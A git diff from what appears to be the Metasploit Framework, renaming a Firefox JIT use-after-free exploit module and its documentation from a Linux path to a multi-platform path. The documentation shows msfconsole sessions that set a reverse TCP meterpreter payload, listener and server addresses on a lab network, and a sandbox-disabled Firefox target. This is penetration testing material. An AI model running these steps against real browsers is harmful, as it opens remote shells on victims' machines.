diff --git a/documentation/modules/exploit/linux/browser/firefox_jit_use_after_free.md b/documentation/modules/exploit/multi/browser/firefox_jit_use_after_free.md similarity index 84% rename from documentation/modules/exploit/linux/browser/firefox_jit_use_after_free.md rename to documentation/modules/exploit/multi/browser/firefox_jit_use_after_free.md index 1f749faab5..03671fed74 100644 --- a/documentation/modules/exploit/linux/browser/firefox_jit_use_after_free.md +++ b/documentation/modules/exploit/multi/browser/firefox_jit_use_after_free.md @@ -31,7 +31,7 @@ You can also download a vulnerable firefox version for Windows from the followin ## Verification Steps -1. Do: `use exploit/linux/browser/firefox_jit_use_after_free +1. Do: `use exploit/multi/browser/firefox_jit_use_after_free 1. Do: `set payload [PAYLOAD]` 1. Do: `set URIPATH /` 1. Do: `set LHOST [IP]` @@ -58,19 +58,19 @@ set MOZ_DISABLE_CONTENT_SANDBOX=1 ``` -msf6 > use exploit/linux/browser/firefox_jit_use_after_free +msf6 > use exploit/multi/browser/firefox_jit_use_after_free [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set payload windows/x64/meterpreter/reverse_tcp +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set DEBUG_EXPLOIT true +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set DEBUG_EXPLOIT true DEBUG_EXPLOIT => true -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set URIPATH / +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set URIPATH / URIPATH => / -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set SRVHOST 192.168.56.1 +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set LHOST 192.168.56.1 +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf6 exploit(linux/browser/firefox_jit_use_after_free) > +msf6 exploit(multi/browser/firefox_jit_use_after_free) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. @@ -95,20 +95,20 @@ Start Firefox without a sandbox, e.g: `MOZ_DISABLE_CONTENT_SANDBOX=1 ./firefox` ``` -msf6 > use exploit/linux/browser/firefox_jit_use_after_free +msf6 > use exploit/multi/browser/firefox_jit_use_after_free [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set URIPATH / +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set URIPATH / URIPATH => / -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set LHOST 192.168.56.1 +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set SRVHOST 192.168.56.1 +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 -msf6 exploit(linux/browser/firefox_jit_use_after_free) > set DEBUG_EXPLOIT true +msf6 exploit(multi/browser/firefox_jit_use_after_free) > set DEBUG_EXPLOIT true DEBUG_EXPLOIT => true -msf6 exploit(linux/browser/firefox_jit_use_after_free) > exploit +msf6 exploit(multi/browser/firefox_jit_use_after_free) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf6 exploit(linux/browser/firefox_jit_use_after_free) > +msf6 exploit(multi/browser/firefox_jit_use_after_free) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. diff --git a/modules/exploits/linux/browser/firefox_jit_use_after_free.rb b/modules/exploits/multi/browser/firefox_jit_use_after_free.rb similarity index 100% rename from modules/exploits/linux/browser/firefox_jit_use_after_free.rb rename to modules/exploits/multi/browser/firefox_jit_use_after_free.rb